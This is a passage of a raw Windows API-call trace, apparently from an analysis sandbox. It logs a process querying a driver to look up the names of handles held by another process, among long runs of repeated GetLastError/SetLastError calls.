(Irp=0xfffffa800c187a90, PriorityBoost=0) [0159.341] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0159.341] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0159.341] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0159.341] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0159.341] PsAcquireProcessExitSynchronization () returned 0x0 [0159.341] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0) [0159.341] ObReferenceObjectByHandle (in: Handle=0xdc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0159.341] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0159.341] PsReleaseProcessExitSynchronization () returned 0x2 [0159.341] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0159.341] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa80024a5044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80024a5044, ReturnLength=0xfffff88005163550) returned 0x0 [0159.342] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0159.342] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0159.342] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0159.342] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0159.342] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x68, lpOverlapped=0x0) returned 1 [0159.342] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0159.342] PsAcquireProcessExitSynchronization () returned 0x0 [0159.342] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0) [0159.342] ObReferenceObjectByHandle (in: Handle=0x118, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000f62610, HandleInformation=0x0) returned 0x0 [0159.342] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0159.342] PsReleaseProcessExitSynchronization () returned 0x2 [0159.342] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0159.342] ObQueryNameString (in: Object=0xfffff8a000f62610, ObjectNameInfo=0xfffffa80024a6044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80024a6044, ReturnLength=0xfffff88005163550) returned 0x0 [0159.342] ObfDereferenceObject (Object=0xfffff8a000f62610) returned 0x5 [0159.343] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0159.343] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0159.343] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0159.343] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xa0, lpOverlapped=0x0) returned 1 [0159.343] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0159.343] PsAcquireProcessExitSynchronization () returned 0x0 [0159.343] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0) [0159.343] ObReferenceObjectByHandle (in: Handle=0x11c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800298b6a0, HandleInformation=0x0) returned 0x0 [0159.343] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0159.343] PsReleaseProcessExitSynchronization () returned 0x2 [0159.343] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0159.343] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80024a7044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80024a7044, ReturnLength=0xfffff88005163508) returned 0x0 [0159.343] ObfDereferenceObject (Object=0xfffffa800298b6a0) returned 0x3 [0159.343] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0159.344] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0159.344] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0159.344] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xa0, lpOverlapped=0x0) returned 1 [0159.344] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0159.344] PsAcquireProcessExitSynchronization () returned 0x0 [0159.344] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0) [0159.344] ObReferenceObjectByHandle (in: Handle=0x130, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002009290, HandleInformation=0x0) returned 0x0 [0159.344] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0159.344] PsReleaseProcessExitSynchronization () returned 0x2 [0159.344] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0159.344] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80024a8044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80024a8044, ReturnLength=0xfffff88005163508) returned 0x0 [0159.344] ObfDereferenceObject (Object=0xfffffa8002009290) returned 0x4 [0159.344] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0159.344] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0159.344] GetLastError () returned 0x57 [0159.345] SetLastError (dwErrCode=0x57) [0159.345] GetLastError () returned 0x57 [0159.345] SetLastError (dwErrCode=0x57) [0159.345] GetLastError () returned 0x57 [0159.345] SetLastError (dwErrCode=0x57) [0159.345] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x1000) returned 0x2d0b20 [0159.345] GetLastError () returned 0x57 [0159.345] SetLastError (dwErrCode=0x57) [0159.345] GetLastError () returned 0x57 [0159.345] SetLastError (dwErrCode=0x57) [0159.345] GetLastError () returned 0x57 [0159.345] SetLastError (dwErrCode=0x57) [0159.345] GetLastError () returned 0x57 [0159.345] SetLastError (dwErrCode=0x57) [0159.345] GetLastError () returned 0x57 [0159.346] SetLastError (dwErrCode=0x57) [0159.346] GetLastError () returned 0x57 [0159.346] SetLastError (dwErrCode=0x57) [0159.346] GetLastError () returned 0x57 [0159.346] SetLastError (dwErrCode=0x57) [0159.346] GetLastError () returned 0x57 [0159.346] SetLastError (dwErrCode=0x57) [0159.346] GetLastError () returned 0x57 [0159.346] SetLastError (dwErrCode=0x57) [0159.346] GetLastError () returned 0x57 [0159.346] SetLastError (dwErrCode=0x57) [0159.346] GetLastError () returned 0x57 [0159.346] SetLastError (dwErrCode=0x57) [0159.346] GetLastError () returned 0x57 [0159.346] SetLastError (dwErrCode=0x57) [0159.346] GetLastError () returned 0x57 [0159.347] SetLastError (dwErrCode=0x57) [0159.347] GetLastError () returned 0x57 [0159.347] SetLastError (dwErrCode=0x57) [0159.347] GetLastError () returned 0x57 [0159.347] SetLastError (dwErrCode=0x57) [0159.347] GetLastError () returned 0x57 [0159.347] SetLastError (dwErrCode=0x57) [0159.347] GetLastError () returned 0x57 [0159.347] SetLastError (dwErrCode=0x57) [0159.347] GetLastError () returned 0x57 [0159.347] SetLastError (dwErrCode=0x57) [0159.347] GetLastError () returned 0x57 [0159.347] SetLastError (dwErrCode=0x57) [0159.347] GetLastError () returned 0x57 [0159.347] SetLastError (dwErrCode=0x57) [0159.347] GetLastError () returned 0x57 [0159.347] SetLastError (dwErrCode=0x57) [0159.347] GetLastError () returned 0x57 [0159.347] SetLastError (dwErrCode=0x57) [0159.348] GetLastError () returned 0x57 [0159.348] SetLastError (dwErrCode=0x57) [0159.348] GetLastError () returned 0x57 [0159.348] SetLastError (dwErrCode=0x57) [0159.348] GetLastError () returned 0x57 [0159.348] SetLastError (dwErrCode=0x57) [0159.348] GetLastError () returned 0x57 [0159.348] SetLastError (dwErrCode=0x57) [0159.348] GetLastError () returned 0x57 [0159.348] SetLastError (dwErrCode=0x57) [0159.348] GetLastError () returned 0x57 [0159.348] SetLastError (dwErrCode=0x57) [0159.348] GetLastError () returned 0x57 [0159.348] SetLastError (dwErrCode=0x57) [0159.348] GetLastError () returned 0x57 [0159.348] SetLastError (dwErrCode=0x57) [0159.348] GetLastError () returned 0x57 [0159.348] SetLastError (dwErrCode=0x57) [0159.348] GetLastError () returned 0x57 [0159.348] SetLastError (dwErrCode=0x57) [0159.348] GetLastError () returned 0x57 [0159.348] SetLastError (dwErrCode=0x57) [0159.348] GetLastError () returned 0x57 [0159.349] SetLastError (dwErrCode=0x57) [0159.349] GetLastError () returned 0x57 [0159.349] SetLastError (dwErrCode=0x57) [0159.349] GetLastError () returned 0x57 [0159.349] SetLastError (dwErrCode=0x57) [0159.349] GetLastError () returned 0x57 [0159.349] SetLastError (dwErrCode=0x57) [0159.349] GetLastError () returned 0x57 [0159.349] SetLastError (dwErrCode=0x57) [0159.349] GetLastError () returned 0x57 [0159.349] SetLastError (dwErrCode=0x57) [0159.349] GetLastError () returned 0x57 [0159.349] SetLastError (dwErrCode=0x57) [0159.349] GetLastError () returned 0x57 [0159.349] SetLastError (dwErrCode=0x57) [0159.349] GetLastError () returned 0x57 [0159.349] SetLastError (dwErrCode=0x57) [0159.349] GetLastError () returned 0x57 [0159.349] SetLastError (dwErrCode=0x57) [0159.349] GetLastError () returned 0x57 [0159.349] SetLastError (dwErrCode=0x57) [0159.350] GetLastError () returned 0x57 [0159.350] SetLastError (dwErrCode=0x57) [0159.350] GetLastError () returned 0x57 [0159.350] SetLastError (dwErrCode=0x57) [0159.350] GetLastError () returned 0x57 [0159.350] SetLastError (dwErrCode=0x57) [0159.350] GetLastError () returned 0x57 [0159.350] SetLastError (dwErrCode=0x57) [0159.350] GetLastError () returned 0x57 [0159.350] SetLastError (dwErrCode=0x57) [0159.350] GetLastError () returned 0x57 [0159.350] SetLastError (dwErrCode=0x57) [0159.350] GetLastError () returned 0x57 [0159.350] SetLastError (dwErrCode=0x57) [0159.350] GetLastError () returned 0x57 [0159.350] SetLastError (dwErrCode=0x57) [0159.350] GetLastError () returned 0x57 [0159.351] SetLastError (dwErrCode=0x57) [0159.351] GetLastError () returned 0x57 [0159.351] SetLastError (dwErrCode=0x57) [0159.351] GetLastError () returned 0x57 [0159.351] SetLastError (dwErrCode=0x57) [0159.351] GetLastError () returned 0x57 [0159.351] SetLastError (dwErrCode=0x57) [0159.351] GetLastError () returned 0x57 [0159.351] SetLastError (dwErrCode=0x57) [0159.351] GetLastError () returned 0x57 [0159.351] SetLastError (dwErrCode=0x57) [0159.351] GetLastError () returned 0x57 [0159.351] SetLastError (dwErrCode=0x57) [0159.351] GetLastError () returned 0x57 [0159.351] SetLastError (dwErrCode=0x57) [0159.351] GetLastError () returned 0x57 [0159.351] SetLastError (dwErrCode=0x57) [0159.352] GetLastError () returned 0x57 [0159.623] SetLastError (dwErrCode=0x57) [0159.623] GetLastError () returned 0x57 [0159.623] SetLastError (dwErrCode=0x57) [0159.623] GetLastError () returned 0x57 [0159.624] SetLastError (dwErrCode=0x57) [0159.624] GetLastError () returned 0x57 [0159.624] SetLastError (dwErrCode=0x57) [0159.624] GetLastError () returned 0x57 [0159.624] SetLastError (dwErrCode=0x57) [0159.624] GetLastError () returned 0x57 [0159.624] SetLastError (dwErrCode=0x57) [0159.624] GetLastError () returned 0x57 [0159.624] SetLastError (dwErrCode=0x57) [0159.625] GetLastError () returned 0x57 [0159.625] SetLastError (dwErrCode=0x57) [0159.625] GetLastError () returned 0x57 [0159.625] SetLastError (dwErrCode=0x57) [0159.625] GetLastError () returned 0x57 [0159.625] SetLastError (dwErrCode=0x57) [0159.625] GetLastError () returned 0x57 [0159.625] SetLastError (dwErrCode=0x57) [0159.625] GetLastError () returned 0x57 [0159.626] SetLastError (dwErrCode=0x57) [0159.626] GetLastError () returned 0x57 [0159.626] SetLastError (dwErrCode=0x57) [0159.626] GetLastError () returned 0x57 [0159.626] SetLastError (dwErrCode=0x57) [0159.626] GetLastError () returned 0x57 [0159.626] SetLastError (dwErrCode=0x57) [0159.626] GetLastError () returned 0x57 [0159.627] SetLastError (dwErrCode=0x57) [0159.627] GetLastError () returned 0x57 [0159.627] SetLastError (dwErrCode=0x57) [0159.627] GetLastError () returned 0x57 [0159.627] SetLastError (dwErrCode=0x57) [0159.627] GetLastError () returned 0x57 [0159.628] SetLastError (dwErrCode=0x57) [0159.628] GetLastError () returned 0x57 [0159.628] SetLastError (dwErrCode=0x57) [0159.628] GetLastError () returned 0x57 [0159.628] SetLastError (dwErrCode=0x57) [0159.628] GetLastError () returned 0x57 [0159.628] SetLastError (dwErrCode=0x57) [0159.628] GetLastError () returned 0x57 [0159.629] SetLastError (dwErrCode=0x57) [0159.629] GetLastError () returned 0x57 [0159.629] SetLastError (dwErrCode=0x57) [0159.629] GetLastError () returned 0x57 [0159.629] SetLastError (dwErrCode=0x57) [0159.629] GetLastError () returned 0x57 [0159.630] SetLastError (dwErrCode=0x57) [0159.630] GetLastError () returned 0x57 [0159.630] SetLastError (dwErrCode=0x57) [0159.630] GetLastError () returned 0x57 [0159.630] SetLastError (dwErrCode=0x57) [0159.630] GetLastError () returned 0x57 [0159.630] SetLastError (dwErrCode=0x57) [0159.631] GetLastError () returned 0x57 [0159.631] SetLastError (dwErrCode=0x57) [0159.631] GetLastError () returned 0x57 [0159.631] SetLastError (dwErrCode=0x57) [0159.631] GetLastError () returned 0x57 [0159.631] SetLastError (dwErrCode=0x57) [0159.631] GetLastError () returned 0x57 [0159.632] SetLastError (dwErrCode=0x57) [0159.632] GetLastError () returned 0x57 [0159.632] SetLastError (dwErrCode=0x57) [0159.632] GetLastError () returned 0x57 [0159.632] SetLastError (dwErrCode=0x57) [0159.632] GetLastError () returned 0x57 [0159.633] SetLastError (dwErrCode=0x57) [0159.633] GetLastError () returned 0x57 [0159.633] SetLastError (dwErrCode=0x57) [0159.633] GetLastError () returned 0x57 [0159.633] SetLastError (dwErrCode=0x57) [0159.633] GetLastError () returned 0x57 [0159.634] SetLastError (dwErrCode=0x57) [0159.634] GetLastError () returned 0x57 [0159.634] SetLastError (dwErrCode=0x57) [0159.634] GetLastError () returned 0x57 [0159.634] SetLastError (dwErrCode=0x57) [0159.634] GetLastError () returned 0x57 [0159.635] SetLastError (dwErrCode=0x57) [0159.635] GetLastError () returned 0x57 [0159.635] SetLastError (dwErrCode=0x57) [0159.635] GetLastError () returned 0x57 [0159.635] SetLastError (dwErrCode=0x57) [0159.635] GetLastError () returned 0x57 [0159.635] SetLastError (dwErrCode=0x57) [0159.635] GetLastError () returned 0x57 [0159.636] SetLastError (dwErrCode=0x57) [0159.636] GetLastError () returned 0x57 [0159.636] SetLastError (dwErrCode=0x57) [0159.636] GetLastError () returned 0x57 [0159.636] SetLastError (dwErrCode=0x57) [0159.636] GetLastError () returned 0x57 [0159.636] SetLastError (dwErrCode=0x57) [0159.636] GetLastError () returned 0x57 [0159.637] SetLastError (dwErrCode=0x57) [0159.637] GetLastError () returned 0x57 [0159.637] SetLastError (dwErrCode=0x57) [0159.637] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0159.637] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0xa2, lpOverlapped=0x0) returned 1 [0159.637] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0159.637] PsAcquireProcessExitSynchronization () returned 0x0 [0159.638] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0) [0159.638] ObReferenceObjectByHandle (in: Handle=0x14c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00195b490, HandleInformation=0x0) returned 0x0 [0159.638] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0159.638] PsReleaseProcessExitSynchronization () returned 0x2 [0159.638] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0159.638] ObQueryNameString (in: Object=0xfffff8a00195b490, ObjectNameInfo=0xfffffa8003206044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003206044, ReturnLength=0xfffff88005163550) returned 0x0 [0159.638] ObfDereferenceObject (Object=0xfffff8a00195b490) returned 0x2 [0159.638] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0159.638] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0159.639] GetLastError () returned 0x57 [0159.639] SetLastError (dwErrCode=0x57) [0159.639] GetLastError () returned 0x57 [0159.639] SetLastError (dwErrCode=0x57) [0159.639] GetLastError () returned 0x57 [0159.639] SetLastError (dwErrCode=0x57) [0159.639] GetLastError () returned 0x57 [0159.639] SetLastError (dwErrCode=0x57) [0159.639] GetLastError () returned 0x57 [0159.640] SetLastError (dwErrCode=0x57) [0159.640] GetLastError () returned 0x57 [0159.640] SetLastError (dwErrCode=0x57) [0159.640] GetLastError () returned 0x57 [0159.640] SetLastError (dwErrCode=0x57) [0159.640] GetLastError () returned 0x57 [0159.640] SetLastError (dwErrCode=0x57) [0159.640] GetLastError () returned 0x57 [0159.640] SetLastError (dwErrCode=0x57) [0159.641] GetLastError () returned 0x57 [0159.641] SetLastError (dwErrCode=0x57) [0159.641] GetLastError () returned 0x57 [0159.641] SetLastError (dwErrCode=0x57) [0159.641] GetLastError () returned 0x57 [0159.641] SetLastError (dwErrCode=0x57) [0159.641] GetLastError () returned 0x57 [0159.641] SetLastError (dwErrCode=0x57) [0159.641] GetLastError () returned 0x57 [0159.641] SetLastError (dwErrCode=0x57) [0159.642] GetLastError () returned 0x57 [0159.642] SetLastError (dwErrCode=0x57) [0159.642] GetLastError () returned 0x57 [0159.642] SetLastError (dwErrCode=0x57) [0159.642] GetLastError () returned 0x57 [0159.642] SetLastError (dwErrCode=0x57) [0159.642] GetLastError () returned 0x57 [0159.642] SetLastError (dwErrCode=0x57) [0159.642] GetLastError () returned 0x57 [0159.642] SetLastError (dwErrCode=0x57) [0159.642] GetLastError () returned 0x57 [0159.642] SetLastError (dwErrCode=0x57) [0159.642] GetLastError () returned 0x57 [0159.643] SetLastError (dwErrCode=0x57) [0159.643] GetLastError () returned 0x57 [0159.643] SetLastError (dwErrCode=0x57) [0159.643] GetLastError () returned 0x57 [0159.643] SetLastError (dwErrCode=0x57) [0159.643] GetLastError () returned 0x57 [0159.643] SetLastError (dwErrCode=0x57) [0159.643] GetLastError () returned 0x57 [0159.643] SetLastError (dwErrCode=0x57) [0159.643] GetLastError () returned 0x57 [0159.644] SetLastError (dwErrCode=0x57) [0159.644] GetLastError () returned 0x57 [0159.644] SetLastError (dwErrCode=0x57) [0159.644] GetLastError () returned 0x57 [0159.644] SetLastError (dwErrCode=0x57) [0159.644] GetLastError () returned 0x57 [0159.644] SetLastError (dwErrCode=0x57) [0159.644] GetLastError () returned 0x57 [0159.644] SetLastError (dwErrCode=0x57) [0159.644] GetLastError () returned 0x57 [0159.645] SetLastError (dwErrCode=0x57) [0159.645] GetLastError () returned 0x57 [0159.645] SetLastError (dwErrCode=0x57) [0159.645] GetLastError () returned 0x57 [0159.645] SetLastError (dwErrCode=0x57) [0159.645] GetLastError () returned 0x57 [0159.645] SetLastError (dwErrCode=0x57) [0159.645] GetLastError () returned 0x57 [0159.646] SetLastError (dwErrCode=0x57) [0159.646] GetLastError () returned 0x57 [0159.646] SetLastError (dwErrCode=0x57) [0159.646] GetLastError () returned 0x57 [0159.646] SetLastError (dwErrCode=0x57) [0159.646] GetLastError () returned 0x57 [0159.646] SetLastError (dwErrCode=0x57) [0159.646] GetLastError () returned 0x57 [0159.646] SetLastError (dwErrCode=0x57) [0159.647] GetLastError () returned 0x57 [0159.647] SetLastError (dwErrCode=0x57) [0159.647] GetLastError () returned 0x57 [0159.647] SetLastError (dwErrCode=0x57) [0159.647] GetLastError () returned 0x57 [0159.647] SetLastError (dwErrCode=0x57) [0159.647] GetLastError () returned 0x57 [0159.647] SetLastError (dwErrCode=0x57) [0159.647] GetLastError () returned 0x57 [0159.648] SetLastError (dwErrCode=0x57) [0159.648] GetLastError () returned 0x57 [0159.648] SetLastError (dwErrCode=0x57) [0159.648] GetLastError () returned 0x57 [0159.648] SetLastError (dwErrCode=0x57) [0159.648] GetLastError () returned 0x57 [0159.649] SetLastError (dwErrCode=0x57) [0159.649] GetLastError () returned 0x57 [0159.649] SetLastError (dwErrCode=0x57) [0159.649] GetLastError () returned 0x57 [0159.649] SetLastError (dwErrCode=0x57) [0159.649] GetLastError () returned 0x57 [0159.649] SetLastError (dwErrCode=0x57) [0159.649] GetLastError () returned 0x57 [0159.650] SetLastError (dwErrCode=0x57) [0159.650] GetLastError () returned 0x57 [0159.650] SetLastError (dwErrCode=0x57) [0159.650] GetLastError () returned 0x57 [0159.651] SetLastError (dwErrCode=0x57) [0159.651] GetLastError () returned 0x57 [0159.651] SetLastError (dwErrCode=0x57) [0159.651] GetLastError () returned 0x57 [0159.651] SetLastError (dwErrCode=0x57) [0159.651] GetLastError () returned 0x57 [0159.651] SetLastError (dwErrCode=0x57) [0159.652] GetLastError () returned 0x57 [0159.652] SetLastError (dwErrCode=0x57) [0159.652] GetLastError () returned 0x57 [0159.652] SetLastError (dwErrCode=0x57) [0159.652] GetLastError () returned 0x57 [0159.652] SetLastError (dwErrCode=0x57) [0159.652] GetLastError () returned 0x57 [0159.652] SetLastError (dwErrCode=0x57) [0159.653] GetLastError () returned 0x57 [0159.653] SetLastError (dwErrCode=0x57) [0159.653] GetLastError () returned 0x57 [0159.653] SetLastError (dwErrCode=0x57) [0159.653] GetLastError () returned 0x57 [0159.653] SetLastError (dwErrCode=0x57) [0159.653] GetLastError () returned 0x57 [0159.653] SetLastError (dwErrCode=0x57) [0159.653] GetLastError () returned 0x57 [0159.653] SetLastError (dwErrCode=0x57) [0159.654] GetLastError () returned 0x57 [0159.654] SetLastError (dwErrCode=0x57) [0159.654] GetLastError () returned 0x57 [0159.654] SetLastError (dwErrCode=0x57) [0159.654] GetLastError () returned 0x57 [0159.654] SetLastError (dwErrCode=0x57) [0159.654] GetLastError () returned 0x57 [0159.654] SetLastError (dwErrCode=0x57) [0159.654] GetLastError () returned 0x57 [0159.654] SetLastError (dwErrCode=0x57) [0159.654] GetLastError () returned 0x57 [0159.655] SetLastError (dwErrCode=0x57) [0159.655] GetLastError () returned 0x57 [0159.655] SetLastError (dwErrCode=0x57) [0159.655] GetLastError () returned 0x57 [0159.655] SetLastError (dwErrCode=0x57) [0159.655] GetLastError () returned 0x57 [0159.655] SetLastError (dwErrCode=0x57) [0159.655] GetLastError () returned 0x57 [0159.655] SetLastError (dwErrCode=0x57) [0159.655] GetLastError () returned 0x57 [0159.656] SetLastError (dwErrCode=0x57) [0159.656] GetLastError () returned 0x57 [0159.656] SetLastError (dwErrCode=0x57) [0159.656] GetLastError () returned 0x57 [0159.656] SetLastError (dwErrCode=0x57) [0159.656] GetLastError () returned 0x57 [0159.656] SetLastError (dwErrCode=0x57) [0159.656] GetLastError () returned 0x57 [0159.656] SetLastError (dwErrCode=0x57) [0159.656] GetLastError () returned 0x57 [0159.656] SetLastError (dwErrCode=0x57) [0159.657] GetLastError () returned 0x57 [0159.657] SetLastError (dwErrCode=0x57) [0159.657] GetLastError () returned 0x57 [0159.657] SetLastError (dwErrCode=0x57) [0159.657] GetLastError () returned 0x57 [0159.657] SetLastError (dwErrCode=0x57) [0159.657] GetLastError () returned 0x57 [0159.657] SetLastError (dwErrCode=0x57) [0159.657] GetLastError () returned 0x57 [0159.657] SetLastError (dwErrCode=0x57) [0159.657] GetLastError () returned 0x57 [0159.657] SetLastError (dwErrCode=0x57) [0159.657] GetLastError () returned 0x57 [0159.658] SetLastError (dwErrCode=0x57) [0159.658] GetLastError () returned 0x57 [0159.658] SetLastError (dwErrCode=0x57) [0159.658] GetLastError () returned 0x57 [0159.658] SetLastError (dwErrCode=0x57) [0159.658] GetLastError () returned 0x57 [0159.658] SetLastError (dwErrCode=0x57) [0159.658] GetLastError () returned 0x57 [0159.658] SetLastError (dwErrCode=0x57) [0159.658] GetLastError () returned 0x57 [0159.658] SetLastError (dwErrCode=0x57) [0159.659] GetLastError () returned 0x57 [0159.659] SetLastError (dwErrCode=0x57) [0159.659] GetLastError () returned 0x57 [0159.659] SetLastError (dwErrCode=0x57) [0159.659] GetLastError () returned 0x57 [0159.659] SetLastError (dwErrCode=0x57) [0159.659] GetLastError () returned 0x57 [0159.659] SetLastError (dwErrCode=0x57) [0159.659] GetLastError () returned 0x57 [0159.659] SetLastError (dwErrCode=0x57) [0159.659] GetLastError () returned 0x57 [0159.660] SetLastError (dwErrCode=0x57) [0159.660] GetLastError () returned 0x57 [0159.660] SetLastError (dwErrCode=0x57) [0159.660] GetLastError () returned 0x57 [0159.660] SetLastError (dwErrCode=0x57) [0159.660] GetLastError () returned 0x57 [0159.660] SetLastError (dwErrCode=0x57) [0159.660] GetLastError () returned 0x57 [0159.661] SetLastError (dwErrCode=0x57) [0159.661] GetLastError () returned 0x57 [0159.661] SetLastError (dwErrCode=0x57) [0159.661] GetLastError () returned 0x57 [0159.661] SetLastError (dwErrCode=0x57) [0159.661] GetLastError () returned 0x57 [0159.661] SetLastError (dwErrCode=0x57) [0159.661] GetLastError () returned 0x57 [0159.662] SetLastError (dwErrCode=0x57) [0159.662] GetLastError () returned 0x57 [0159.662] SetLastError (dwErrCode=0x57) [0159.662] GetLastError () returned 0x57 [0159.662] SetLastError (dwErrCode=0x57) [0159.662] GetLastError () returned 0x57 [0159.662] SetLastError (dwErrCode=0x57) [0159.662] GetLastError () returned 0x57 [0159.662] SetLastError (dwErrCode=0x57) [0159.662] GetLastError () returned 0x57 [0159.663] SetLastError (dwErrCode=0x57) [0159.663] GetLastError () returned 0x57 [0159.663] SetLastError (dwErrCode=0x57) [0159.663] GetLastError () returned 0x57 [0159.663] SetLastError (dwErrCode=0x57) [0159.664] GetLastError () returned 0x57 [0159.922] SetLastError (dwErrCode=0x57) [0159.922] GetLastError () returned 0x57 [0159.922] SetLastError (dwErrCode=0x57) [0159.923] GetLastError () returned 0x57 [0159.923] SetLastError (dwErrCode=0x57) [0159.923] GetLastError () returned 0x57 [0159.923] SetLastError (dwErrCode=0x57) [0159.923] GetLastError () returned 0x57 [0159.923] SetLastError (dwErrCode=0x57) [0159.923] GetLastError () returned 0x57 [0159.924] SetLastError (dwErrCode=0x57) [0159.924] GetLastError () returned 0x57 [0159.924] SetLastError (dwErrCode=0x57) [0159.924] GetLastError () returned 0x57 [0159.924] SetLastError (dwErrCode=0x57) [0159.924] GetLastError () returned 0x57 [0159.924] SetLastError (dwErrCode=0x57) [0159.924] GetLastError () returned 0x57 [0159.925] SetLastError 